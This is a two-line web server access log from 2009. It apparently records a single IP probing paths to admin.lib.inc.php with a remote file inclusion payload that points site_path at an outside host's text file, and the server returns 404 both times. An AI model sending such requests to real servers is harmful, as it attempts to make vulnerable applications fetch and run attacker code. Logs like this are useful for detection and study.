219.254.35.13 - - [14/Nov/2009:00:42:55 -0600] "GET //include/admin.lib.inc.php?site_path=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
219.254.35.13 - - [14/Nov/2009:00:42:55 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
